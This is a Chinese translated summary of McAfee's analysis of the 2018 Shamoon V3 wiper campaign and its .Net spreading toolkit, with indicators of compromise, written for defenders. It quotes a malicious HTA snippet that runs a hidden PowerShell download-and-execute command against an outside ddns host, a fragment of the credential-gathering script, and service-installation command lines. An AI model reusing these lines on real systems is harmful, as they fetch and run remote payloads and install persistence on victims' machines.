在上週，McAfee高階威脅研究小組釋出了一篇分析文章。在這篇文章中，該研究小組分析了針對中東和歐洲企業的新一波Shamoon“wiper（磁碟擦除惡意軟體）”攻擊活動，並討論了最新Shamoon攻擊活動與此前Shamoon攻擊活動的區別。其中最值得關注的是，最新版本的Shamoon（Shamoon V3）作為一個wiper模組，也作為一種獨立的惡意軟體被使用。

基於對Shamoon V3的分析以及其他一些線索，，該研究小組得出了這樣一個結論，這些攻擊背後的幕後黑手很可能是伊朗黑客組織APT33，或一個試圖偽裝成APT33的黑客組織。

在2016到2017年期間的Shamoon攻擊活動中，攻擊者同時使用了Shamoon V2和另一種wiper——Stonedrill。而在2018年的攻擊活動中，該研究小組觀察到了Shamoon V3和另一款最初由

該研究小組的分析表明，最新版本的Shamoon似乎只是一個包含多個模組的.Net工具包的一部分。具體來說，該研究小組確認了以下模組：

• OCLC.exe：用於讀取攻擊者建立的目標計算機列表，並負責執行第二個工具spreader.exe。
• Spreader.exe：用於向目標計算機傳播wiper。另外，它也被用於獲取有關作業系統版本的資訊。
• SpreaderPsexec.exe：與spreader.exe類似，但它使用的是psexec.exe來遠端執行wiper。
• SlHost.exe：wiper模組，遍歷系統並擦除每一個目標檔案。

這也反映出，至少有多名開發人員參與了為最新一波攻擊準備惡意軟體的工作。該研究小組曾在上一篇文章中指出，Shamoon V3作為.Net工具包中的一個wiper模組，它也可作為一種獨立的惡意軟體供其他攻擊組織使用。從最近的這些攻擊來看，這種假設似乎得到了證實。該研究小組還了解到，攻擊者在數個月前就已經啟動了新活動的前期準備工作，目標旨在通過wiper的執行來破壞目標系統。

這篇文章提供了有關新一波Shamoon攻擊的更多見解，以及對.Net工具包的詳細分析。

地緣政治背景

與此前一樣，攻擊的動機尚不明確。因為，Shamoon V1攻擊的是位於中東的兩個目標，Shamoon V2攻擊的是位於沙烏地阿拉伯的多個目標，而Shamoon V3利用歐洲的供應商對中東企業發起了供應鏈攻擊。

在這個.Net工具包中，該研究小組發現瞭如下ASCII圖案：

這些字元組成了一個類似於阿拉伯文“تَبَّتْ يَدَا أَبِي لَهَبٍ وَتَبَّ”的圖案。這是古蘭經（Surah Masad, Ayat 1 [111:1]）中的一句話，意思是“願火焰之父的雙手毀滅吧！他已經毀滅。”

攻擊流程

惡意軟體是如何進入受害者的網路的？

該研究小組的分析表明，攻擊者在前期準備階段建立了一些與某些合法域名（提供就業機會的網站）非常相似的網站。例如：

Hxxp://possibletarget.ddns.com:880/JobOffering

由該研究小組發現的許多URL都與主要在中東運營的能源企業有關，其中一些網站還包含有執行其他payload的惡意HTML應用程式檔案，其餘網站則旨在誘使受害者使用自己的憑證進行登入。根據McAfee的遙測資料，這些攻擊似乎是從2018年8月底開始的，而目的就是收集這些憑證。

以下是一個惡意HTML應用程式檔案的程式碼示例：

YjDrMeQhBOsJZ = “WS”

wcpRKUHoZNcZpzPzhnJw = “crip”

RulsTzxTrzYD = “t.Sh”

MPETWYrrRvxsCx = “ell”

PCaETQQJwQXVJ = (YjDrMeQhBOsJZ + wcpRKUHoZNcZpzPzhnJw + RulsTzxTrzYD + MPETWYrrRvxsCx)

OoOVRmsXUQhNqZJTPOlkymqzsA=new ActiveXObject(PCaETQQJwQXVJ)

ULRXZmHsCORQNoLHPxW = “cm”

zhKokjoiBdFhTLiGUQD = “d.e”

KoORGlpnUicmMHtWdpkRwmXeQN = “xe”

KoORGlpnUicmMHtWdp = “.”

KoORGlicmMHtWdp = “(‘http://mynetwork.ddns.net:880/*****.ps1’)

OoOVRmsXUQhNqZJTPOlkymqzsA.run(‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -w 1 IEX (New-Object Net.WebClient)’+KoORGlpnUicmMHtWdp+’downloadstring’+KoORGlicmMHtWdp)

OoOVRmsXUQhNqZJTPOlkymqzsA.run(‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -window hidden -enc

上面這個指令碼被用於在受害者的計算機上開啟一個命令shell，並從外部下載一個PowerShell指令碼。對PowerShell指令碼的分析表明，它被用於收集使用者名稱、密碼和域名等資訊。以下是PowerShell指令碼的部分程式碼：

function primer {

if ($env:username -eq “$($env:computername)$”){$u=”NT AUTHORITY\SYSTEM”}else{$u=$env:username}

$o=”$env:userdomain\$u

$env:computername

$env:PROCESSOR_ARCHITECTURE

通過收集到的憑證，攻擊者能夠登入到目標網路中，並傳播wiper。

.Net工具包

如上所述，新一波Shamoon攻擊是通過一個.Net工具包進行的，旨在傳播ShamoonV3和Filerase。

第一個模組（OCLC.exe）被用於讀取儲存在兩個本地目錄（“shutter”和“light”）中的兩個文字檔案，它們包含有目標計算機列表。

另外，OCLC.exe也被用於啟動一個新的隱藏命令視窗程序來執行第二個模組Spreader.exe，該模組被用於使用上述兩個文字檔案作為引數，以傳播ShamoonV3和Filerase。

首先，Spreader.exe模組會使用上述包含目標計算機列表和Windows版本的兩個文字檔案作為引數，以檢查目標計算機的Windows版本。

然後，將可執行檔案（Shamoon和Filerase）放入資料夾“Net2”中。

另外，它還會在遠端計算機上建立一個資料夾：C:\\Windows\System32\Program Files\Internet Explorer\Signing。

然後，將上述可執行檔案複製到該資料夾中。

接下來，它會建立一個批處理檔案“\\RemoteMachine\admin$\\process.bat”來執行遠端計算機上的可執行檔案。需要注意的是，這個批處理檔案包含了可執行檔案的路徑。然後，它會設定執行批處理檔案的許可權。

如果上述過程失敗，Spreader.exe模組還會建立一個名為“NotFound.txt”的文字檔案，其中包含目標計算機名稱和作業系統版本。攻擊者可以通過它來追蹤傳播過程中出現的問題。

以下展示的是上述過程所涉及到的一些函式：

如果在資料夾“Net2”中不存在可執行檔案，Spreader.exe模組則會檢查資料夾“all”和“Net4”。

為了傳播wiper，攻擊者還使用了另一個模組SpreaderPsexec.exe。需要說明的是，Psexec.exe是微軟PSTools工具中的一種用於遠端執行命令的管理工具。

這裡的區別在於，SpreaderPsexec.exe使用的Psexec.exe儲存在資料夾“Net2”中。這意味著它也可以在其他計算機上使用，以進一步傳播wiper。

wiper包含三個選項：

• SilentMode：在沒有任何輸出的情況下執行wiper。
• BypassAcl：提升許可權。值得注意的是，它始終是開啟的。
• PrintStackTrace：追蹤已擦除的資料夾和檔案的數量。

如上所述，BypassAcl始終是開啟的（始終為“true” ）。它為wiper提供了以下許可權：

• SeBackupPrivilege
• SeRestorePrivilege
• SeTakeOwnershipPrivilege
• SeSecurityPrivilege

為了找到目標檔案，wiper使用了GetFullPath函式來獲取路徑。

它會擦除找到的每一個目標資料夾和檔案。

正如文章一開頭所說的那樣，它能夠遍歷系統每一個資料夾中的每一個檔案。

對於要擦除的檔案和資料夾，wiper首先會移除它們的“只讀”屬性。

接下來，它會將每個檔案的建立、修改及訪問時間都更改為3000年1月1日 12:01:01。

然後，它會使用隨機字串對每個檔案進行兩次重寫。

它首先會使用帶有ACCESS_MASK DELETE flag的API CreateFile擦除檔案。

然後，使用FILE_DISPOSITION_INFORMATION擦除檔案。

ProcessTracker函式則被用來追蹤擦除的情況。

總結

McAfee高階威脅研究小組表示，在2017年的Shamoon攻擊浪潮中，他們觀察到了兩種wiper。在2018年12月的攻擊中，他們觀察到了類似的特徵。採用“工具包”的形式，攻擊者可以通過受害者的網路來傳播wiper模組。工具包是採用.Net編寫的，且沒有經過混淆處理。這與作為wiper模組的Shamoon V3不同，它的程式碼是經過加密處理的，作為一種逃避安全檢測的手段。

很難確定這些攻擊的動機，因為McAfee高階威脅研究小組還沒有找到足夠的線索。但他們表示，確實在Shamoon V3中看到了出現在Shamoon V2中的技術。另外，政治宣告似乎已經成為Shamoon攻擊的一部分。在V1中，攻擊者使用了一張正在燃燒的美國國旗的圖片。在V2中，攻擊者使用了一張溺亡的敘利亞男孩的圖片（附帶有葉門阿拉伯語的文字），似乎暗指敘利亞和葉門的衝突。現在，我們在V3中看到了一段摘自《古蘭經》的句子，可能預示著攻擊的動機與另一場中東衝突有關。

通過對比在這些攻擊中使用的TTP（戰術、技術和流程），以及域名和工具（如FireEye在其報告中所描述的），McAfee高階威脅研究小組得出結論，這些攻擊背後的幕後黑手很可能是伊朗黑客組織APT33，或一個試圖偽裝成APT33的黑客組織。

IOC

雜湊值：

• OCLC.exe: d9e52663715902e9ec51a7dd2fea5241c9714976e9541c02df66d1a42a3a7d2a
• Spreader.exe: 35ceb84403efa728950d2cc8acb571c61d3a90decaf8b1f2979eaf13811c146b
• SpreaderPsexec.exe: 2ABC567B505D0678954603DCB13C438B8F44092CFE3F15713148CA459D41C63F
• Slhost.exe: 5203628a89e0a7d9f27757b347118250f5aa6d0685d156e375b6945c8c05eb8a

檔案路徑和檔名：

• C:\net2\
• C:\all\
• C:\net4\
• C:\windows\system32\
• C:\\Windows\System32\Program Files\Internet Explorer\Signing
• \\admin$\process.bat
• NothingFound.txt
• MaintenaceSrv32.exe
• MaintenaceSrv64.exe
• SlHost.exe
• OCLC.exe
• Spreader.exe
• SpreaderPsexec.exe

命令列：

• cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat
• cmd.exe /c “ping -n 30 127.0.0.1 >nul && sc config MaintenaceSrv binpath= C:\windows\system32\MaintenaceSrv64.exe LocalService” && ping -n 10 127.0.0.1 >nul && sc start MaintenaceSrv
• MaintenaceSrv32.exe LocalService
• cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat ” “
• MaintenaceSrv32.exe service